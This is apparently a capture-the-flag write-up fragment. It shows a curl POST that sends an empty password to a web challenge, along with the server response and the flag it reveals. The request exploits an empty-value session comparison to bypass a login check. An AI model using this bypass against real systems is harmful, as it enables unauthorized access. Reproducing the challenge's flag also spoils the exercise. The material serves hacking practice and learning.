to get the session password equal to the posted password I use Curl.

$curl -i http://web.msspctf.info/web3/ -X POST -F "password="


Response : 
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Fri, 19 May 2017 14:59:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.21
Set-Cookie: PHPSESSID=jr3af5nvbt299gki5bmdb4q043; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 86
Content-Type: text/html

<pre>Your account is unlocked. Here is your flag: msspctf{#T4g_M3_1am_Th3_B0ss#}</pre>


msspctf{#T4g_M3_1am_Th3_B0ss#}

